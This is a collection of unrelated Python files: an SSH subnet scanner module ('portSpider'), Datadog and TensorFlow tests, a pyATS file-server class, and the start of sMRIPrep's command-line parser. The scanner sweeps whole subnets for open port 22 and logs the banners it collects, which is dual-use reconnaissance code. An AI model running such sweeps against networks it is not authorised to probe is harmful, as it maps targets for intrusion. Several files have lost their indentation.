| source | python |
|---|---|
ssh.py
|
import socket
import datetime
import sys
import ipaddress
import threading
import os
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m'
class ThreadManager(object):
    def __init__(self, ipList):
        self.allIps = ipList
        self.size = len(ipList)
        self.i = 0
        self.lock = threading.Lock()
    def getNextIp(self):
        # Hand out each IP exactly once; the lock guards the shared counter
        # because every scan thread calls this method concurrently.
        with self.lock:
            if self.i < self.size:
                ip = self.allIps[self.i]
                self.i += 1
                return ip
            return 0
    def getID(self):
        # Number of IPs handed out so far (drives the progress display).
        return self.i
def coreOptions():
options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"],
["threads", "Number of threads to run.", "50"], ["verbose", "Show verbose output.", "true"]]
return options
def createIPList(network):
net4 = ipaddress.ip_network(network)
ipList = []
for x in net4.hosts():
ipList.append(x)
return ipList
def print1(data):
if verbose:
print("\033[K" + data)
def checkServer(address, port):
s = socket.socket()
s.settimeout(float(portTimeout))
try:
s.connect((address, port))
data = s.recv(4096)
s.close()
return ["True", data]
    except socket.error:
        s.close()
        return ["False", None]
    except Exception:
        s.close()
        return ["FAIL", None]
def writeToFile(line):
file = open(fileName, "a")
file.write(line)
file.close()
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget():
sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str(
allIPs) + GREEN + " hosts done." + END)
restart_line()
sys.stdout.flush()
def scan(i):
global status
global openPorts
global done
while True:
if stop:
sys.exit()
ip = threadManager.getNextIp()
if ip == 0:
break
status = (threadManager.getID() / allIPs) * 100
status = format(round(status, 2))
status = str(status) + "%"
stringIP = str(ip)
if stop:
sys.exit()
isUp = checkServer(stringIP, port)
if isUp[0] != "FAIL":
if isUp[0] == "True":
openPorts = openPorts + 1
print1(GREEN + "[+] Port " + str(port) + " is open on '" + stringIP + "' - Connection response: " + str(isUp[1]) + END)
logLine = stringIP + " - " + str(isUp[1]) + "\n"
logLines.append(logLine)
elif not isUp[0] == "True":
print1(RED + "[-] Port " + str(port) + " is closed on '" + stringIP + "'" + END)
else:
print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END)
done = done + 1
def core(moduleOptions):
print(
"\n" + GREEN + "SSH module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n")
global status
global fileName
global allIPs
global portTimeout
global ips
global threadCount
global done
global verbose
global stop
global port
global openPorts
global logLines
global threadManager
logLines = []
stop = False
done = 0
portTimeout = moduleOptions[1][2]
network = moduleOptions[0][2]
threadCount = int(moduleOptions[2][2])
verbose = moduleOptions[3][2]
if verbose == "true":
verbose = True
else:
verbose = False
try:
ipList = createIPList(network)
allIPs = len(ipList)
if allIPs == 0:
raise Exception
except:
print(RED + "[!] Invalid subnet. Exiting...\n")
return
threadManager = ThreadManager(ipList)
i = datetime.datetime.now()
i = str(i).replace(" ", "_")
i = str(i).replace(":", "-")
script_path = os.path.dirname(os.path.realpath(__file__))
script_path = script_path.replace("modules", "")
if not os.path.exists(script_path + "logs"):
os.makedirs(script_path + "logs")
fileName = script_path + "logs/log-ssh-portSpider-" + i + ".log"
file = open(fileName, 'w')
file.write("subnet: " + network + "\n")
file.close()
    port = 22
    openPorts = 0
    status = "0%"  # initialize so statusWidget() has a value before any scan thread updates it
    threads = []
for i in range(threadCount):
i -= 1
t = threading.Thread(target=scan, args=(i,))
t.daemon = True
threads.append(t)
t.start()
try:
while True:
if done == threadCount and threadManager.getID() == allIPs:
break
statusWidget()
except KeyboardInterrupt:
stop = True
verbose = False
print("\n" + RED + "[I] Stopping..." + END)
stop = True
verbose = False
for logLine in logLines:
try:
writeToFile(logLine)
except:
writeToFile("WRITING-ERROR")
print("\n\n" + GREEN + "[I] SSH module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
|
test_lambda_wrapper_thread_safety.py
|
import time
# import unittest
import threading
from datadog import lambda_metric, datadog_lambda_wrapper
from datadog.threadstats.aws_lambda import _lambda_stats
TOTAL_NUMBER_OF_THREADS = 1000
class MemoryReporter(object):
""" A reporting class that reports to memory for testing. """
def __init__(self):
self.distributions = []
self.dist_flush_counter = 0
def flush_distributions(self, dists):
self.distributions += dists
self.dist_flush_counter = self.dist_flush_counter + 1
@datadog_lambda_wrapper
def wrapped_function(id):
lambda_metric("dist_" + str(id), 42)
    # sleeping lets the OS schedule another thread
time.sleep(0.001)
lambda_metric("common_dist", 42)
# Lambda wrapper thread-safety test is muted below because of Python 2.7 issues
# class TestWrapperThreadSafety(unittest.TestCase):
# def test_wrapper_thread_safety(self):
# _lambda_stats.reporter = MemoryReporter()
# for i in range(TOTAL_NUMBER_OF_THREADS):
# threading.Thread(target=wrapped_function, args=[i]).start()
# # Wait all threads to finish
# time.sleep(10)
# # Check that at least one flush happened
# self.assertGreater(_lambda_stats.reporter.dist_flush_counter, 0)
# dists = _lambda_stats.reporter.distributions
# self.assertEqual(len(dists), TOTAL_NUMBER_OF_THREADS + 1)
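# --- Editor's sketch (not part of the original test) ---
# A plain-function version of the muted unittest above, kept only to
# illustrate the intended flow; the thread count is reduced from
# TOTAL_NUMBER_OF_THREADS and the assertions mirror the muted test.
def run_thread_safety_check(num_threads=50):
    _lambda_stats.reporter = MemoryReporter()
    threads = [threading.Thread(target=wrapped_function, args=[i])
               for i in range(num_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    # At least one flush, and one distribution per thread plus the shared
    # "common_dist" (as asserted in the muted test above).
    assert _lambda_stats.reporter.dist_flush_counter > 0
    assert len(_lambda_stats.reporter.distributions) == num_threads + 1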
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
|
server.py
|
import importlib
import logging
import multiprocessing
import queue
import socket
import random
import netaddr
import psutil
from pyats import configuration as cfg
from pyats.datastructures import AttrDict
from pyats.utils.dicts import recursive_update
logger = logging.getLogger(__name__)
process = multiprocessing.get_context('fork')
FILETRANSFER_SUBNET_CFG = 'filetransfer.subnet'
TIMEOUT_DEFAULT = 10
ALPHA = 'abcdefghijklmnopqrstuvwxyz'
ALPHA = ALPHA + ALPHA.upper() + '0123456789'
class FileServer:
def __new__(cls, *args, **kwargs):
        '''Instantiate the protocol-specific FileServer subclass.
        '''
factory_cls = cls
# Get class specific to protocol
if factory_cls is FileServer:
protocol = kwargs.get('protocol', '').lower()
if not protocol:
raise TypeError('No protocol specified')
try:
mod = 'genie.libs.filetransferutils.fileserver.protocols.%s' \
% protocol
protocol_mod = importlib.import_module(mod)
factory_cls = protocol_mod.FileServer
            except (ImportError, AttributeError) as e:
                raise TypeError('File server protocol %s not found!' %
                                str(protocol)) from e
# Init new class
if factory_cls is not cls:
self = factory_cls.__new__(factory_cls, *args, **kwargs)
elif super().__new__ is object.__new__:
self = super().__new__(factory_cls)
self.__init__(*args, **kwargs)
else:
self = super().__new__(factory_cls, *args, **kwargs)
return self
def __init__(self, **kwargs):
self.server_info = {}
self.timeout = kwargs.pop('timeout', TIMEOUT_DEFAULT)
self.server_info.update(kwargs)
if 'subnet' not in self.server_info:
if 'address' in self.server_info:
# Can use the address as the subnet if given (with netmask /32)
self.server_info['subnet'] = self.server_info['address']
else:
# Otherwise try looking in the pyats configuration
self.server_info['subnet'] = cfg.get(FILETRANSFER_SUBNET_CFG)
# Ensure FileServer has a subnet
if not self.server_info.get('subnet'):
raise TypeError('FileServer missing subnet')
# Get specific ip from subnet
self.server_info['address'] = self._get_ip(self.server_info['subnet'])
# Extract name if provided
self.name = None
if 'name' in self.server_info:
self.name = self.server_info.pop('name')
# Extract testbed if provided
self.testbed = None
if 'testbed' in self.server_info:
self.testbed = self.server_info.pop('testbed')
# Extract synchro if provided to reduce number of file handles
self.synchro = None
if 'synchro' in self.server_info:
self.synchro = self.server_info.pop('synchro')
def __enter__(self):
# Start server, usually by spawning a process and get new info
info = self.start_server()
recursive_update(self.server_info, info)
# Verify server is successfully running using a client
try:
self.verify_server()
except Exception as e:
self.stop_server()
raise OSError('Failed to verify %s' % str(type(self))) from e
# Log address of server
address = self.server_info['address']
port = self.server_info.get('port')
if port:
address += ':%s' % port
logger.info('%s File Server started on %s' %
(self.protocol.upper(), address))
# Update testbed with new server info
if self.testbed is not None and self.name:
recursive_update(
self.testbed.servers.setdefault(self.name, AttrDict()),
self.server_info)
return self.server_info
def __exit__(self, type_=None, val=None, tb=None):
self.stop_server()
# Remove from testbed
if self.testbed and self.name:
self.testbed.servers.pop(self.name)
def __del__(self):
self.stop_server()
def _get_ip(self, subnet, netmask=None):
# convert subnet into an IPNetwork object
subnet = netaddr.IPNetwork(subnet)
if netmask:
subnet.netmask = netmask
valid_ips = []
# Check the IP addresses of all interfaces to find the ones that match
# the given subnet
interfaces = psutil.net_if_addrs()
for iname, iface in interfaces.items():
for snic in iface:
if snic.family == socket.AF_INET:
ip = netaddr.IPAddress(snic.address)
if ip in subnet:
valid_ips.append(snic.address)
# Must have exactly one match
if len(valid_ips) == 0:
raise TypeError('No valid IP for subnet %s' % (subnet))
elif len(valid_ips) > 1:
raise TypeError('More than one valid IP for subnet %s.\n%s\nTry a '
'more specific subnet.' %
(subnet, '\n'.join(valid_ips)))
return valid_ips[0]
def start_server(self):
# Start server
if self.synchro:
# start queue from given multiprocessing manager to reduce number of
# file handles
self.queue = self.synchro.Queue()
else:
# No multiprocessing manager, make a queue
self.queue = multiprocessing.Queue()
self.server_proc = process.Process(target=self.run_server)
self.server_proc.start()
# Wait for queue to ensure the server is running
try:
info = self.queue.get(True, self.timeout)
except queue.Empty:
self.stop_server()
raise Exception('%s server did not start after %s seconds' %
(self.protocol.upper(), self.timeout))
return info
def run_server(self):
# method to be run as a forked process
raise NotImplementedError
def verify_server(self):
raise NotImplementedError
def stop_server(self):
# Use getattr because not all protocols start a process
if getattr(self, 'server_proc', None):
self.server_proc.terminate()
self.server_proc.join()
self.server_proc = None
def _generate_credential(self):
# Generate a random string to use as credentials if none are given
return ''.join([random.choice(ALPHA) for x in range(10)])
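# --- Editor's usage sketch (not part of the original module) ---
# FileServer is meant to be used as a context manager: __new__ selects the
# protocol-specific subclass, __enter__ spawns and verifies the server and
# returns its info dict, and __exit__ tears it down. The protocol name and
# subnet below are hypothetical.
#
#     with FileServer(protocol='ftp', subnet='10.0.0.0/24') as info:
#         print(info['address'], info.get('port'))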
|
run.py
|
#!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""sMRIPrep: Structural MRI PREProcessing workflow."""
def main():
"""Set an entrypoint."""
opts = get_parser().parse_args()
return build_opts(opts)
def check_deps(workflow):
"""Make sure all dependencies are installed."""
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd')
and which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object."""
from pathlib import Path
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from niworkflows.utils.spaces import Reference, SpatialReferences, OutputReferencesAction
from ..__about__ import __version__
parser = ArgumentParser(description='sMRIPrep: Structural MRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store', type=Path,
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store', type=Path,
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'sMRIPrep (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version='smriprep v{}'.format(__version__))
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--participant-label', '--participant_label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
g_bids.add_argument(
'--bids-filter-file', action='store', type=Path, metavar='PATH',
help='a JSON file describing custom BIDS input filters using pybids '
'{<suffix>:{<entity>:<filter>,...},...} '
'(https://github.com/bids-standard/pybids/blob/master/bids/layout/config/bids.json)')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nprocs', '--ncpus', '--nthreads', '--n_cpus', '-n-cpus',
action='store', type=int,
help='number of CPUs to be used.')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem-gb', '--mem_gb', action='store', default=0, type=float,
help='upper bound memory limit for sMRIPrep processes (in GB).')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--output-spaces', nargs='*', action=OutputReferencesAction, default=SpatialReferences(),
help='paths or keywords prescribing output spaces - '
'standard spaces will be extracted for spatial normalization.')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument(
'--skull-strip-template', default='OASIS30ANTs', type=Reference.from_string,
help='select a template for skull-stripping with antsBrainExtraction')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
g_ants.add_argument(
'--skull-strip-mode', action='store', choices=('auto', 'skip', 'force'),
